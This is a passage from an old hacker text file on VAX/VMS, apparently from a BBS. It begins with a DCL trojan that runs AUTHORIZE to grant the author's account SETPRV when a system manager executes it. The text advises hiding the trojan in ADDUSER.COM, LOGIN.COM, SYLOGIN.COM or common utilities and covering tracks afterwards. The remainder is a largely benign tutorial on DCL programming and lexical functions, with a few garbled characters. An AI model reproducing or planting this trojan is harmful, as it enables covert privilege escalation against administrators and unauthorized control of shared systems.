check for the privileges of the user (just like in the above program), then
try:

$open/write file sys$scratch:adduaf.tmp
$write file "$ RUN SYS$SYSTEM:AUTHORIZE"
$write file "MODIFY NAME/PRIV=SETPRV"
$close file
$@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat
$del sys$scratch:adduaf.*;*


This little patch in the coding will modify your own users privileges and give
them SETPRV when the superuser executes this routine.  The trick is to hide it
within some other program so he doesn't even realize he has done anything! Of
course after the routine has been successfully executed, the original coding
should be put back.  There are many places you can put this routine, including
ADDUSER.COM (if you have write access)!  That would mean, every time the
system manager went to add a new user, he would also boost your privs! HaHa,
quite ironic eh?!  The farthest thing that he wants to do, and you make him do
it without even realizing.  Of course you should use your imagination and put
this or a similar routine in a place where it will be quickly executed.  The
longer the code stays around without being execute, the more chance that it
will be discovered.  An optimum program would be something that the
users/operators execute frequently (eg notes, mail, phone etc)  Other good
places are the LOGIN.COM and SYLOGIN.COM files.  Just remember to cover your
tracks once you're done!!

 This is but a brief introduction to Trojans and the like.  You should use your
own imagination to come up with other ways of making the system operators
succumb to your wishes...heh heh.


DCL PROGRAMMING
---------------

 No file would be complete without at least mentioning programming Command
Procedures.  Basically, these are like BAT files from MS-DOS or script files
from UNIX.  They form a rudimentary but powerful language that allows you to
quickly create small programs to handle most simple tasks.  This section is not
intended to be a a full blown tutorial on programming in DCL, rather its an
introduction to what it is all about.
 It is quite easy to pick up programming in DCL and the best way to learn is to
have a look at some of the COM files you will find on the various VAXes that
you hack on.  By studying these, you can quickly learn the methods on how to
perform
certain routines.  Below I have listed some of the commonly needed routines
when programming in DCL:


PASSING PARAMETERS

Parameters can be passed to DCL programs directly from the shell in several
ways. Here are a few examples:

(1) @sample 24 25

    When you execute this, the values 24 and 25 are passed to the sample.com
    file in the variables p1 and p2 respectively. ie p1=24, p2=25

(2) @sample Paul Cramer

    p1=PAUL,  p2=CRAMER

(3) @sample "Paul Cramer"

    p1=Paul,  p2=Cramer

(4) name= "Paul Cramer"
    @sample 'name'

    This example demonstrates the m K  of passing predefined variables to a
    command procedure.  In this case,  p1=PAUL,  p2=CRAMER

(5) name ="""Paul Cramer"""
    @sample 'name'

    Note that passing the variable in three double-quotes preserves the case.
    p1=Paul,  p2=Cramer



GETTING INPUT

  Often it is necessary to get some sort of input from the user when executing
a command procedure.  This is performed through the INQUIRE command. Some
examples follow:

(1) INQUIRE variable "prompt"

    This will display the 'prompt' message and then wait for input.  The string
    passed is kept in 'variable'

(2) INQUIRE/NOPUNC variable "prompt"

    When you specify /NOPUNC, the prompt will NOT be followed by a colon and
    space as is the default.

(3) INQUIRE/LOCAL variable "prompt"
    INQUIRE/GLOBAL variable "prompt"

    It should be noted that if you specify /LOCAL, the variable will remain in
    the local symbol table accessible only by this particular COM file.  If on
    the other hand, you specify /GLOBAL, the variable is placed in the global
    symbol table and is made accessible to other files.

(4) IF pn .eqs. "" THEN INQUIRE pn "prompt"

    You can use this method to check if a certain variable (pn in this case) is
    null or not.  If it is, you can ask for input.

(5) READ/PROMPT="prompt" SYS$COMMAND variable

    This is another method of getting input.



SUPPLY INPUT FOR A PROGRAM

Often you may need to create a file and get input from some outside source.
Again there are several ways of doing this.  Here I will outline three
different methods:

FROM DATA      :- CREATE TEST.DAT
                  data line 1
                  data line 2
                       :
                       :
                    etc etc

FROM TERMINAL  :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND
                  CREATE TEST.DAT

FROM A FILE    :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT
                  CREATE TEST.FILE


OUTPUTTING INFORMATION

In general when outputting information, you should always send it to SYS$OUTPUT
What this does is automatically write to whatever the user has defined as
SYS$OUTPUT.  It doesn't matter what type of terminal or whatever it is, but it
will send it in the correct format.  Some examples follow:

(1)  WRITE SYS$OUTPUT "literal text"

     This will print 'literal text' on your terminal.

(2)  WRITE SYS$OUTPUT symbol-name

     This will print on your terminal whatever value is held in symbol-name

(3)  WRITE SYS$OUTPUT "literal text ''symbol-name'  literal text"

     This example shows how you can mix in normal text with a variable and
     follow it by more text.

(4)  TYPE SYS$INPUT
     this is a sample message
     that is spread out over
     several lines.

     You would use this method whenever there are more than a few lines of text
     to be printed.



WRITING TO A FILE

You will find that many times when writing a COMmand procedure you will need to
save certain information to a file.  This can be accomplished with a routine
similar to:

OPEN/WRITE FILE TEST.DAT
WRITE:
 INQUIRE DATA "Input Data"
 IF DATA .EQS. "" THEN GOTO DONE
 WRITE FILE DATA
 GOTO WRITE
DONE:
 CLOSE FILE

I will give a quick breakdown of what is going on here.  First you open the
file that you want, including the /WRITE qualifier followed by the filename.
This sample program simply inputs data, writes each line to a file and exits
when the user hits RETURN on a blank line.  Simple but effective text input
facility.



READING A FILE

Once you have written a file, you will often need to read that information back
in again. For example you may keep track of when the person last ran the file.
Each time the file is run, you would save the time/date to a file, and then
read it back in, and display it on each subsequent execution.  The sample
structure of a read routine would be:

OPEN/READ FILE TEST.DAT
READ:
 READ/END_OF_FILE=DONE FILE DATA
      .
      .
      .
 GOTO READ
DONE:
 CLOSE FILE

This routine would loop and keep reading a file, one line at a time, storing
the information in DATA until the end of file is detected.



CONDITIONAL LOGIC

No programming language would be complete without the ability to perform logic.
Although it is very simplistic, it provides just enough power to handle most
simple conditions.  Some examples:

(1) IF p1 .EQS. "" THEN GOTO DEFAULT

    In this example the procedure checks to see if the parameter passed in p1
    is NULL or not.  If it is then the program branches to DEFAULT

(2) IF p1 .NES. 10 THEN GOTO end_label
           .
           .
           .
    END_LABEL:

    Here we see that if p1 does not equal 10 then the program branches to
    END_LABEL, otherwise it continues.

(3) COUNT = 0
    LOOP:
     COUNT=COUNT+1
        .
        .
        .
     IF COUNT .LE. 10 THEN GOTO LOOP
    EXIT


    This example shows how to establish a loop in a command procedure, using
    the symbol COUNT and an IF statement.  The IF statement checks the value
    of COUNT and performs an EXIT when the value is greater than 10


EXPRESSIONS

   The data operations and comparisons are listed below in order of precedence
beginning with the highest (operations and comparisons grouped together in the
table have the same precedence).


   +--------+---------------------------------------------------------+
   Operator                    Description
   +--------+---------------------------------------------------------+
      +     Indicates a positive number
      -     Indicates a negative number
   +--------+---------------------------------------------------------+
      *     Multiplies two numbers
      /     Divides two numbers
   +--------+---------------------------------------------------------+
      +     (1) Adds two numbers
            (2) Concatenates two character strings
      -     (1) Subtracts two numbers
            (2) Subtracts two character strings
   +--------+---------------------------------------------------------+
    .EQS.   Tests if two character strings are equal
    .GES.   Tests if first character string is greater than or equal
    .GTS.   Tests if first character string is greater than
    .LES.   Tests if first character string is less than or equal
    .LTS.   Tests if first character string is less than
    .NES.   Tests if two character strings are not equal
    .EQ.    Tests if two numbers are equal
    .GE.    Tests if first number is greater than or equal to
    .GT.    Tests if first number is greater than
    .LE.    Tests if first number is less than or equal to
    .LT.    Tests if first number is less than
    .NE.    Tests if two numbers are not equal
   +--------+---------------------------------------------------------+
    .NOT.   Logically negates a number
   +--------+---------------------------------------------------------+
    .AND.   Combines two numbers with a logical AND
   +--------+---------------------------------------------------------+
    .OR.    Combines two numbers with a logical OR
   +--------+---------------------------------------------------------+




LEXICAL FUNCTIONS
-----------------

That concludes the introduction to DCL programming.  One thing that you should
keep in mind is that many powerful string editing and environment information
commands can be accessed from COM files.  These are called the LEXICAL
functions There are too numerous to list them all here, so I will just provide
a summary of the primary lexical functions and a brief description:



LEXICAL       DESCRIPTION
-------------+------------------------------------------------------------------
f$cvsi       !converts character string data (signed value) to an integer
f$cvtime     !retrieves information about an absolute, combination, or delta
              time
f$cvui       !converts character string data (unsigned value) to an integer
f$directory  !returns the current default directory name string
f$edit       !edits a character string based on the edits specified
f$element    !extracts an element from a string in which the elements are
             !separated by a specified delimiter
f$environment!obtains information about the DCL command environment
f$extract    !extracts a substring from a character string expression
f$fao        !converts the control string to an ASCII string
f$file_attrib!returns attribute information for a specified file
f$getdvi     !returns parameters for a specified device
f$getjpi     !returns accounting, status and identification info for a process
f$getsyi     !returns status and identification information about local or
             !remote nodes.
f$identifer  !converts an identifier in named format to its integer equivalent
f$integer    !returns the integer equivalent of the result of an expression
f$locate     !locates a character substring within a string and returns its
             !offset within the string
f$logical    !translates a logical name and returns the equivalence name string
f$message    !returns the message text associated with a system status code
f$mode       !shows the mode in which the process is executing
f$parse      !parses a file spec and returns either the expanded file spec or
             !a particular field that you specify
f$pid        !for each invocation, returns the next PID in sequence
f$privilege  !returns a value of TRUE or FALSE depending on whether your
             !process privileges match the privileges listed in the argument
f$process    !returns the current process name string
f$search     !searches the directory and returns the full file spec for any
              file
f$setprv     !sets the specified privileges and returns the previous state
f$string     !returns the string equivalent of the result of the specified
             !expression
f$time       !returns the data and time of day in format:  dd-mm-yy hh:mm:ss.cc
f$trnlnm     !translates a logical name and returns the equivalent name string
f$type       !determines the data type of a symbol
f$user       !returns the current user identification code (UIC)
f$verify     !set or read current command procedure state
-------------+-----------------------------------------------------------------

This list just outlines the main lexical functions.  Within each function there
may be many more subfunctions.  If you need help on any of these functions or
their subfunctions, just type HELP lexical [lexicalname] at any DCL prompt ($)



ERROR MESSAGES
--------------

 Occasionally when you are using DCL, you will come across error messages that
are sent to you by the VAX.  Here I will give a break down of what the
different fields in the message represent and how to interpret them. First of
all, the general format of an error message is:

%facility-l-ident, text

NOTE: not all messages are ERROR messages.  Often it is only an informational
      message telling you that a certain task was successful or whatever. In
      any case here is what each field means:

facility  -this is the name of the facility that produced the  error (for
           example, CLI for the Command Language Interpreter).

l         -this is a one letter code indicating the severity of the error.
           The severities are:

                  I - Informational      E - Error
                  S - Success            F - Severe error
                  W - Warning

ident     -this is an abbreviation for the message text.

text      -this is a short description of the nature of the error.


Here is an example of an error message, and how to interpret it:

%SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege

The percent sign in the beginning tells you it is a system message from the VAX
the first field (SYSTEM) indicates that it is a SYSTEM error.  The second field
(F) shows that it is a severe error.  The third field (NOCMKRNL) is a short
abbreviation showing that you do not have the CMKRNL privilege, and the actual
text is followed giving the error in TCHING

Downloaded From P-80 Systems 304-744-2253


Downloaded From P-80 International Information Systems 304-744-2253 12yrs+
